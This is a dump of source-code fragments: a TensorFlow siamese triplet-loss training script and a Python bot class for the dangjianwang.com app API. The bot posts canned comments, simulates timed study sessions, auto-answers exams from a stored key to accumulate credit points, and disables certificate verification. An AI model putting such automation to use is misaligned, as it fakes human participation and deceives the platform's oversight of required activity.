test_similar,\n dissimilar_placeholder: test_dissimilar,\n labels_placeholder: test_labels,\n is_training_placeholder: False}\n _, _global_step = sess.run([train_step, global_step],\n feed_dict=train_dict)\n anchor_out, similar_out, dissimilar_out = sess.run([\n flatten_out_anchor, flatten_out_similar,\n flatten_out_dissimilar], 
feed_dict=train_dict)\n _train_loss, _train_pos_dist, _train_neg_dist = sess.run([\n loss, pos_dist, neg_dist], feed_dict=train_dict)\n _test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,\n pos_dist, neg_dist], feed_dict=test_dict)\n print('distance:', list(zip(_train_pos_dist.flatten(),\n _train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = 'No mean or variance'\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(\n bn_moving_vars[0].name)\n one_moving_meaning_show = '{}={}'.format(bn_moving_vars\n [0].name, np.mean(one_moving_meaning.eval()))\n print(one_moving_meaning_show)\n show_text = (\n 'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'\n .format(epoch_num, iters_num + 1, _global_step,\n _train_loss, '0.99', _test_loss))\n print(show_text)\n if _global_step % snapshot == 0:\n constant_graph = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['flatten_anchor'])\n save_model_name = model_name + '-' + str(_global_step\n ) + '.pb'\n with tf.gfile.FastGFile(pb_path + save_model_name, mode\n ='wb') as fw:\n fw.write(constant_graph.SerializeToString())\n ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',\n global_step=total_iters_num)\n print('Successfully saved model {}'.format(save_model_name)\n )\n",
"step-4": "import tensorflow as tf\nfrom tensorflow.python.framework import graph_util\nfrom net import siameseNet_batchnorm as siameseNet\nimport dataset\nimport numpy as np\nimport cv2\nimport os\nbatch_size = 64\ninput_height = 32\ninput_width = 32\ntotal_epoch_num = 50\nsnapshot = 100\nsupport_image_extensions = ['.jpg', '.png', '.jpeg', '.bmp']\nmargin = 1.0\nchannals = 3\ntrain_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/train'\ntest_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/test'\nmodel_path = 'models/'\npb_path = os.path.join(model_path, 'pb/')\nckpt_path = os.path.join(model_path, 'ckpt/')\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\nmodel_name = 'siamese_triplet_28out_allloss_bn'\nif __name__ == '__main__':\n first_shape = None\n anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='anchor')\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='similar')\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='dissimilar')\n labels_placeholder = tf.placeholder(tf.float32, shape=[None if \n first_shape is None else first_shape * 3], name='labels')\n is_training_placeholder = tf.placeholder_with_default(False, shape=(),\n name='is_training')\n siamese_net = siameseNet.siameseNet()\n anchor = siamese_net.inference(anchor_placeholder, reuse=False,\n is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,\n labels_placeholder, margin)\n flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')\n 
flatten_out_similar = tf.identity(similar, name='flatten_similar')\n flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n with tf.control_dependencies([tf.group(*update_ops)]):\n train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,\n global_step=global_step)\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables()\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n test_dataset = dataset.dataset(test_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n (train_anchor, train_similar, train_dissimilar, train_labels\n ) = train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar, test_labels = (\n test_dataset.next_triplet_batch())\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n labels_placeholder: train_labels,\n is_training_placeholder: True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n labels_placeholder: test_labels,\n is_training_placeholder: False}\n _, _global_step = sess.run([train_step, global_step],\n 
feed_dict=train_dict)\n anchor_out, similar_out, dissimilar_out = sess.run([\n flatten_out_anchor, flatten_out_similar,\n flatten_out_dissimilar], feed_dict=train_dict)\n _train_loss, _train_pos_dist, _train_neg_dist = sess.run([\n loss, pos_dist, neg_dist], feed_dict=train_dict)\n _test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,\n pos_dist, neg_dist], feed_dict=test_dict)\n print('distance:', list(zip(_train_pos_dist.flatten(),\n _train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = 'No mean or variance'\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(\n bn_moving_vars[0].name)\n one_moving_meaning_show = '{}={}'.format(bn_moving_vars\n [0].name, np.mean(one_moving_meaning.eval()))\n print(one_moving_meaning_show)\n show_text = (\n 'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'\n .format(epoch_num, iters_num + 1, _global_step,\n _train_loss, '0.99', _test_loss))\n print(show_text)\n if _global_step % snapshot == 0:\n constant_graph = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['flatten_anchor'])\n save_model_name = model_name + '-' + str(_global_step\n ) + '.pb'\n with tf.gfile.FastGFile(pb_path + save_model_name, mode\n ='wb') as fw:\n fw.write(constant_graph.SerializeToString())\n ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',\n global_step=total_iters_num)\n print('Successfully saved model {}'.format(save_model_name)\n )\n",
"step-5": "import tensorflow as tf\nfrom tensorflow.python.framework import graph_util\nfrom net import siameseNet_batchnorm as siameseNet\nimport dataset\nimport numpy as np\nimport cv2\nimport os\n\nbatch_size=64\ninput_height=32\ninput_width=32\ntotal_epoch_num=50\nsnapshot=100\nsupport_image_extensions=[\".jpg\",\".png\",\".jpeg\",\".bmp\"]\nmargin=1.0\nchannals=3\n\ntrain_image_root=\"D:/forTensorflow/charRecTrain/forMyDNNCode/train\"\ntest_image_root=\"D:/forTensorflow/charRecTrain/forMyDNNCode/test\"\n\nmodel_path=\"models/\"\npb_path=os.path.join(model_path,\"pb/\")\nckpt_path=os.path.join(model_path,\"ckpt/\")\n\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\nmodel_name=\"siamese_triplet_28out_allloss_bn\"\n\nif __name__ == '__main__':\n # image_paths,labels=get_images_path(test_image_root)\n # data=next_batch(True,None,image_paths,labels)\n # for left,right,label in zip(*data):\n # cv2.imshow(\"left\",left)\n # cv2.imshow(\"right\", right)\n # print(label)\n # cv2.waitKey(0)\n\n first_shape=None\n anchor_placeholder = tf.placeholder(tf.float32,shape=[first_shape,input_height,input_width,channals],name=\"anchor\")\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name=\"similar\")\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name=\"dissimilar\")\n labels_placeholder = tf.placeholder(tf.float32, shape=\n [None if first_shape is None else first_shape * 3, ], name=\"labels\")\n is_training_placeholder = tf.placeholder_with_default(False, shape=(), name=\"is_training\")\n siamese_net=siameseNet.siameseNet()\n\n anchor = siamese_net.inference(anchor_placeholder,reuse=False,is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder,reuse=True,is_training=is_training_placeholder)\n dissimilar = 
siamese_net.inference(dissimilar_placeholder,reuse=True,is_training=is_training_placeholder)\n loss,pos_dist,neg_dist = siamese_net.loss(anchor,similar,dissimilar,labels_placeholder,margin)\n\n flatten_out_anchor = tf.identity(anchor, name=\"flatten_anchor\")\n flatten_out_similar = tf.identity(similar, name=\"flatten_similar\")\n flatten_out_dissimilar = tf.identity(dissimilar, name=\"flatten_dissimilar\")\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n # learning_rate = tf.train.exponential_decay(0.01, global_step, 100, 0.9)\n # optimizer = tf.train.MomentumOptimizer(learning_rate, 0.9)\n\n with tf.control_dependencies([tf.group(*update_ops)]):\n # train_step = optimizer.minimize(loss, global_step)\n train_step = tf.train.MomentumOptimizer(0.01, 0.90).\\\n minimize(loss, global_step=global_step)\n\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables() # 从全局变量中获得batch norm的缩放和偏差\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root,batch_size,support_image_extensions,\n input_height,input_width,channals)\n\n test_dataset = dataset.dataset(test_image_root, batch_size, support_image_extensions,\n input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # if os.path.exists(os.path.join(ckpt_path, \"checkpoint\")):\n # ckpt_saver.restore(sess, tf.train.latest_checkpoint(ckpt_path))\n\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n\n train_anchor, train_similar, train_dissimilar,train_labels = \\\n 
train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar,test_labels = \\\n test_dataset.next_triplet_batch()\n\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n\t\t\t\t\t\t\t labels_placeholder:train_labels,\n is_training_placeholder:True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n\t\t\t\t\t\t\t labels_placeholder:test_labels,\n is_training_placeholder: False}\n _,_global_step=sess.run([train_step,global_step], feed_dict=train_dict)\n\n anchor_out,similar_out,dissimilar_out = sess.run([\n flatten_out_anchor,flatten_out_similar,flatten_out_dissimilar],\n feed_dict=train_dict)\n\n _train_loss,_train_pos_dist,_train_neg_dist = \\\n sess.run([loss,pos_dist,neg_dist], feed_dict=train_dict)\n _test_loss,_test_pos_dist,_test_neg_dist =\\\n sess.run([loss,pos_dist,neg_dist], feed_dict=test_dict)\n\n print(\"distance:\",list(zip(_train_pos_dist.flatten(),_train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = \"No mean or variance\"\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(bn_moving_vars[0].name)\n one_moving_meaning_show = \"{}={}\".\\\n format(bn_moving_vars[0].name,np.mean(one_moving_meaning.eval()))\n\n print(one_moving_meaning_show)\n show_text = \"epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}\".format \\\n (epoch_num, iters_num + 1, _global_step, _train_loss, \"0.99\", _test_loss)\n print(show_text)\n\n if _global_step % snapshot == 0:\n # 保存PB\n constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph_def, [\"flatten_anchor\"])\n save_model_name=model_name + \"-\" + str(_global_step) + \".pb\"\n with tf.gfile.FastGFile(pb_path + save_model_name, mode=\"wb\") as fw:\n fw.write(constant_graph.SerializeToString())\n # 保存CKPT\n 
ckpt_saver.save(sess, ckpt_path + model_name + \".ckpt\", global_step=total_iters_num)\n print(\"Successfully saved model {}\".format(save_model_name))\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Runner:
def __init__(self, appid='TJZHDJ01', username='', password=''):
urllib3.disable_warnings()
self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')
self.username = username
self.password = password
self.thumbedFilePath = './lib/'.format(username)
self.logFilePath = './log/'.format(username)
self.errFilePath = './err/'.format(username)
self.thumbedFileList = []
self.debug = True
self.session = requests.session()
self.appid = appid
self.headers = {'User-Agent':
'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'
, 'header_version': '80', 'system': 'android', 'Connection':
'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}
self.token = self.getToken()
time.sleep(0.1)
self.thumbPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Learn/List',
'https://mapi.dangjianwang.com/v3_1/Activities/List',
'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])
self.thumbPages = [i[1] for i in self.thumbPageList]
time.sleep(0.1)
self.helpPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Help/List'])
self.helpPages = [i[1] for i in self.helpPageList]
self.helpResults = {}
time.sleep(0.1)
self.studyPageList = self.getPagesII(urls=[
'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])
self.studyPages = [i[1] for i in self.studyPageList]
time.sleep(0.1)
self.studyRsults = {}
self.thumbedPages = []
self.thumbResults = {}
self.helpedPages = []
self.multiThumbed = []
self.viewsResults = []
self.examC19Info = []
self.examlist = []
self.qaList = []
<|reserved_special_token_0|>
def writeErr2File(self, err):
path = self.logFilePath
fullPath = '{}{}err.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, err))
print('err已经写入{}'.format(fullPath))
def writeLog2File(self, log):
path = self.logFilePath
fullPath = '{}{}logs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, log))
print('log已经写入{}'.format(fullPath))
<|reserved_special_token_0|>
def getThumbFromFile(self):
"""
:return: 文件中id组成的列表
"""
path = self.thumbedFilePath
inFileList = []
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(fullPath):
return fullPath
with open(fullPath, 'r') as f:
inFileList.extend(list(set(f.readlines()[0].split(','))))
with open(fullPath, 'w') as f1:
f1.write(','.join(sorted(inFileList)))
return inFileList
def getExcuteTimes(self):
"""
返回点赞等自动执行的次数的字典
:return:
"""
excuteTimes = {}
credInfo = self.getCredItinfo()
print(credInfo)
currentScore = credInfo[0]
thumbScore = credInfo[1]['信息评论'].split('/')[0]
thumbExcuteTimes = 10 - int(thumbScore)
excuteTimes.update({'thumb': thumbExcuteTimes})
helpScore = credInfo[1]['互助广场回答'].split('/')[0]
helpExctuteTimes = 2 - int(helpScore)
excuteTimes.update({'help': helpExctuteTimes})
viewScore = credInfo[1]['党员视角发布'].split('/')[0]
viewExcuteTimes = int((4 - int(viewScore)) / 2)
excuteTimes.update({'view': viewExcuteTimes})
examScore = credInfo[1]['在线知识竞答'].split('/')[0]
examExcuteTimes = int((4 - int(examScore)) / 2)
excuteTimes.update({'exam': examExcuteTimes})
flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]
['在线阅读学习资料'].split('/')[0])
flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]
['学习资料写体会'].split('/')[0])
examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0
excuteTimes.update({'study': examExcuteTimes})
return excuteTimes
def getToken(self):
"""
获得一个连接的token
每个连接都需要使用到
:return:
"""
data = {'appid': self.appid, 'username': self.username, 'password':
self.password}
longinurl = 'https://mapi.dangjianwang.com/v3_1/login'
r = self.session.post(url=longinurl, data=data, verify=False)
rjson = r.json()
if rjson['code'] == '200':
return rjson['token']
else:
print('token 获得失败')
return None
def getRJson(self, url):
data = {'token': self.token, 'appid': self.appid}
return self.session.post(url=url, data=data, verify=False).json()
def getUserInfo(self):
"""
获得一大串用户的信息,暂时没用
:return:
"""
infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'
return self.getRJson(url=infoUrl)
def getCredItinfoToday(self):
"""
获得人员当前的得分等级参数
:return:
"""
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
info = self.getRJson(url=creditInfourl)
fullScore = info['data']['full']
gainScore = info['data']['gain']
currentLevel = info['data']['level']
username = info['data']['name']
ret = {'fullScore': fullScore, 'gainScore': gainScore,
'currentLevel': currentLevel, 'username': username}
return ret
<|reserved_special_token_0|>
def getPages(self, urls):
pages = []
for url in urls:
data = self.getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
pages.append((i['title'], i['id']))
return pages
def getPagesII(self, urls):
def getRJson(url):
data = {'token': self.token, 'appid': self.appid, 'type_id':
'791', 'page_index': '1'}
return self.session.post(url=url, data=data, verify=False).json()
pages = []
for url in urls:
data = getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
pages.append((i['name'], i['id']))
return pages
def doThumb(self, id):
"""
点赞函数,操作与id对应的页面
每次记录对应的信息到文件
:return:
"""
contents = ['关注', '关注!', '关注!!']
data = {'id': id, 'comment': random.choice(contents), 'token': self
.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
print(rjson)
if rjson['code'] == '1003':
self.token = self.getToken()
elif rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.thumbedPages.append(id)
for i in list(set(self.thumbPageList)):
if id == i[1]:
temp = {'title': i[0]}
self.thumbResults.update(temp)
log = '信息点赞:\n主题: {}\n提交:{}'.format(i[0], data[
'comment'])
detail = '{} 主题:{}\n回复:{}\n'.format(self.
getCurrentTime(), i[0], data['comment'])
write2File(self, './results/', 'result.txt', log)
thumbInfo = {'title': i[0], 'reply': data['comment']}
self.thumbPages.remove(id)
self.writeThumb2File(id=id)
return detail, thumbInfo
elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':
print('因评论过快,等待一段时间')
time.sleep(20)
else:
print('rjson', rjson)
self.thumbedPages.remove(id)
self.writeThumb2File(id=id)
log = '点赞:{}'.format(rjson)
self.writeLog2File(log)
print(log)
time.sleep(10)
def doHelp(self, id, callback=None):
"""
互助功能
:param id:
:return:
"""
detail = ''
helpInfo = None
log = ''
content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',
'要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']
data = {'id': id, 'content': random.choice(content), 'token': self.
token, 'appid': self.appid}
print(data)
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.helpedPages.append(id)
self.helpPages.remove(id)
for i in self.helpPageList:
if id == i[1]:
curTime = self.getCurrentTime()
self.helpResults.update({'title': id[0]})
log = '互助:\n主题: {}\n提交内容: {}'.format(i[0], rjson[
'comment'])
write2File(self, './results/', 'result.txt', log)
detail = '{} 主题: {}\n提交内容: {}\n'.format(curTime, i[
0], rjson['comment'].strip())
helpInfo = {'title': i[0], 'reply': rjson['comment']}
else:
pass
else:
pass
log = '帮助:{}'.format(rjson)
self.writeLog2File(log)
print(log)
return detail, log, helpInfo
def doView(self):
"""
党员视角发布功能
:return:
"""
content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']
data = {'content': random.choice(content), 'token': self.token,
'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.viewsResults.append(1)
else:
pass
log = '党员视角:{}'.format(rjson)
detail = '{} 党员视角:\n发布内容:{}\n'.format(self.getCurrentTime(), rjson[
'data']['content'])
publicContent = rjson['data']['content']
return detail, publicContent
def doStudy(self, mid):
"""
前三个post函数的响应的三个请求
get用来获得填写的内容
最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。
:param mid:
:return:
"""
interval = 60 * 5 + 5
def post1():
data = {'mid': mid, 'token': self.token, 'appid': self.appid}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post1:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post2():
data = {'token': self.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post2:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post3():
data = {'mid': mid, 'token': self.token, 'appid': self.appid}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post3:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def get1():
url = (
'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'
.format(self.token, mid))
rjson = self.session.get(url=url)
text = rjson.content
soup = BeautifulSoup(text, 'html.parser')
retContents = []
for div in soup.find_all('p'):
p = div.text.strip()
retContents.append(p if 100 > len(p) < 200 else p[0:200])
return random.choice(retContents)
def recordFeeling(content=None):
if not content:
content = (
'伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'
)
data = {'mid': mid, 'token': self.token, 'appid': self.appid,
'content': content}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习recordFeeling:{}'.format(rjson)
self.writeLog2File(log)
print('in recordFeeling')
print(log)
if rjson['code'] == '200':
return {'content': content}
elif rjson['code'] == '1120':
addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',
'人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',
'民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']
return recordFeeling(content='{}\n{}'.format(content,
random.choice(addtion)))
else:
return None
def readTime():
data = {'mid': mid, 'token': self.token, 'appid': self.appid,
'time': interval}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习readTime:{}'.format(rjson)
self.writeLog2File(log)
print(log)
post1()
time.sleep(1)
post2()
time.sleep(1)
post3()
time.sleep(1)
content = get1()
time.sleep(1)
count = 0
print('开始学习请稍后')
for i in range(interval):
count += 1
if count % 30 == 0:
print('已用时{}秒'.format(count))
time.sleep(1)
print('填写的学习体会', content)
self.studyRsults.update(recordFeeling(content=content))
time.sleep(1)
readTime()
time.sleep(1)
pass
def doExam(self):
"""
:param self:
:return:
"""
ids = []
data = {'page': '1', 'page_size': '20', 'token': self.token,
'appid': self.appid}
examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'
rjson = self.session.post(url=examlistUrl, data=data, verify=False
).json()
time.sleep(0.3)
print('*' * 99)
data = {'page': '1', 'page_size': '20', 'token': self.token,
'appid': self.appid}
banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'
rjson = self.session.post(url=banklistUrl, data=data, verify=False
).json()
for i in rjson['data']:
tem = i['bank_name'], i['id']
self.examlist.append(tem)
if i['bank_name'] == '十九大报告100题(单选)':
temp = {'title': i['bank_name'], 'detail': i['detail'],
'id': i['id']}
self.examC19Info.append(temp)
time.sleep(0.3)
print('*' * 99)
data = {'bank': '6', 'token': self.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
aa = rjson['data']
paper = aa['id']
for i in aa['questions']:
temp = {'id': i['id'], 'content': i['content']}
ids.append(temp)
print('*' * 99)
time.sleep(0.5)
answers = []
for i in ids:
correctAnswer = Qa.objects.filter(question__contains=i['content'])[
0]
answerText = correctAnswer.answerText
answer = correctAnswer.answer
temp = {'index': i['id'], 'answer': answer}
qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}
self.qaList.append(qa)
print(qa, i['content'])
answers.append(temp)
time.sleep(1)
hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,
'answers': json.dumps(answers)}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'
rjson = self.session.post(url=commitUrl, data=hdata, verify=False
).json()
print(rjson)
print(self.examlist)
print(self.examC19Info)
print(self.qaList)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Runner:
def __init__(self, appid='TJZHDJ01', username='', password=''):
urllib3.disable_warnings()
self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')
self.username = username
self.password = password
self.thumbedFilePath = './lib/'.format(username)
self.logFilePath = './log/'.format(username)
self.errFilePath = './err/'.format(username)
self.thumbedFileList = []
self.debug = True
self.session = requests.session()
self.appid = appid
self.headers = {'User-Agent':
'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'
, 'header_version': '80', 'system': 'android', 'Connection':
'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}
self.token = self.getToken()
time.sleep(0.1)
self.thumbPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Learn/List',
'https://mapi.dangjianwang.com/v3_1/Activities/List',
'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])
self.thumbPages = [i[1] for i in self.thumbPageList]
time.sleep(0.1)
self.helpPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Help/List'])
self.helpPages = [i[1] for i in self.helpPageList]
self.helpResults = {}
time.sleep(0.1)
self.studyPageList = self.getPagesII(urls=[
'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])
self.studyPages = [i[1] for i in self.studyPageList]
time.sleep(0.1)
self.studyRsults = {}
self.thumbedPages = []
self.thumbResults = {}
self.helpedPages = []
self.multiThumbed = []
self.viewsResults = []
self.examC19Info = []
self.examlist = []
self.qaList = []
<|reserved_special_token_0|>
def writeErr2File(self, err):
path = self.logFilePath
fullPath = '{}{}err.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, err))
print('err已经写入{}'.format(fullPath))
def writeLog2File(self, log):
path = self.logFilePath
fullPath = '{}{}logs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, log))
print('log已经写入{}'.format(fullPath))
def writeThumb2File(self, id):
path = self.thumbedFilePath
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write(',{}'.format(id))
print('点赞记录已经写入{}'.format(fullPath))
def getThumbFromFile(self):
"""
:return: 文件中id组成的列表
"""
path = self.thumbedFilePath
inFileList = []
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(fullPath):
return fullPath
with open(fullPath, 'r') as f:
inFileList.extend(list(set(f.readlines()[0].split(','))))
with open(fullPath, 'w') as f1:
f1.write(','.join(sorted(inFileList)))
return inFileList
def getExcuteTimes(self):
"""
返回点赞等自动执行的次数的字典
:return:
"""
excuteTimes = {}
credInfo = self.getCredItinfo()
print(credInfo)
currentScore = credInfo[0]
thumbScore = credInfo[1]['信息评论'].split('/')[0]
thumbExcuteTimes = 10 - int(thumbScore)
excuteTimes.update({'thumb': thumbExcuteTimes})
helpScore = credInfo[1]['互助广场回答'].split('/')[0]
helpExctuteTimes = 2 - int(helpScore)
excuteTimes.update({'help': helpExctuteTimes})
viewScore = credInfo[1]['党员视角发布'].split('/')[0]
viewExcuteTimes = int((4 - int(viewScore)) / 2)
excuteTimes.update({'view': viewExcuteTimes})
examScore = credInfo[1]['在线知识竞答'].split('/')[0]
examExcuteTimes = int((4 - int(examScore)) / 2)
excuteTimes.update({'exam': examExcuteTimes})
flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]
['在线阅读学习资料'].split('/')[0])
flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]
['学习资料写体会'].split('/')[0])
examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0
